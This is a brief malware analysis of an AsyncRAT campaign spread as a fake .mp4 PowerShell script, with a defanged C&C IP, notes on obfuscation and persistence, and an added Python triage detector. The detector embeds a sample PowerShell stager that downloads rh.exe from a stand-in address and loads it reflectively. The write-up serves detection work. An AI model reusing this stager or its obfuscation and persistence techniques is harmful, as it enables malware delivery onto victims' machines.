Important elements of the analysis:
- C&C IP Address
- CMD script used for spreading
- PowerShell script downloader
- Fake .mp4 video
- InProcServer32 registry key querying
- Persistence
This article gives a quick overview of an AsyncRAT threat delivered as a fake .mp4 video, with the C&C IP address 92.255.57[.]221.
The .mp4 file is actually a malicious PowerShell script, which is invoked through a powershell -Command call from a batch (CMD) script.
The variable $tUslYAEMJo holds the C&C URL with the junk characters "AmYwu" spliced into it; the script replaces them with empty strings to recover the URL of the rh.exe artifact, as follows:
The script then downloads the malicious content with a DownloadData call, creates a new assembly object from it and loads the downloaded content with [System.Reflection.Assembly]::Load.
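As an added triage example (not code from the original analysis), the following Python helper recognises the two traits described above: string literals with a junk token spliced in that a `-replace '<junk>',''` strips out, and the DownloadData plus [System.Reflection.Assembly]::Load reflective-loading pair. It recovers the cleaned URL from a script body and returns a verdict. The sample script is constructed to mimic the observed pattern, and 192.0.2.10 is a documentation address standing in for the real C&C.

```python
import re

# Constructed sample (not the original script): junk token "AmYwu" is spliced
# into the URL and removed with -replace before DownloadData is called.
# 192.0.2.10 is a documentation address standing in for the real C&C.
SAMPLE_SCRIPT = r"""
$tUslYAEMJo = 'htAmYwutp://192.0.2.AmYwu10/rh.exAmYwue'
$url = $tUslYAEMJo -replace 'AmYwu', ''
$bytes = (New-Object Net.WebClient).DownloadData($url)
[System.Reflection.Assembly]::Load($bytes)
"""

# `-replace '<junk>', ''`: the token that is stripped from obfuscated strings.
JUNK_REPLACE = re.compile(r"-replace\s+['\"]([^'\"]+)['\"]\s*,\s*(?:''|\"\")", re.I)
# `$name = '<literal>'`: string literals that may hide a URL.
STRING_ASSIGN = re.compile(r"\$\w+\s*=\s*['\"]([^'\"]+)['\"]")
URL = re.compile(r"^(?:https?|ftp)://[\w.\-]+(?::\d+)?(?:/\S*)?$", re.I)
LOADER_MARKERS = ("DownloadData", "[System.Reflection.Assembly]::Load")


def recover_urls(script):
    """Strip every junk token named in a -replace from each string literal and
    keep the results that form a URL."""
    junk = JUNK_REPLACE.findall(script)
    found = []
    for literal in STRING_ASSIGN.findall(script):
        cleaned = literal
        for token in junk:
            cleaned = cleaned.replace(token, "")
        if URL.match(cleaned) and cleaned not in found:
            found.append(cleaned)
    return junk, found


def triage(script):
    """Return junk tokens, recovered URLs, loader markers present and a verdict:
    recovered URL + download + reflective load is treated as a stager."""
    junk, urls = recover_urls(script)
    markers = [m for m in LOADER_MARKERS if m.lower() in script.lower()]
    if urls and len(markers) == len(LOADER_MARKERS):
        verdict = "stager"
    elif junk or markers:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"junk_tokens": junk, "urls": urls, "markers": markers, "verdict": verdict}


if __name__ == "__main__":
    print(triage(SAMPLE_SCRIPT))
```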
rh.exe contacts the IP address 92.255.57[.]221 (the following shows a disconnection event):
The RAT queries registry keys related to InProcServer32, which can be used to register a 32-bit in-process server, to establish persistence or to bypass AMSI.
The IP address 92.255.57[.]221 is flagged as malicious by OSINT sources and is associated with AsyncRAT, XWorm and FakeCaptcha threats:
At the time of writing, the malicious C&C IP address has no open ports or services, and it is registered in Russia to Chang Way Technologies Co. Limited: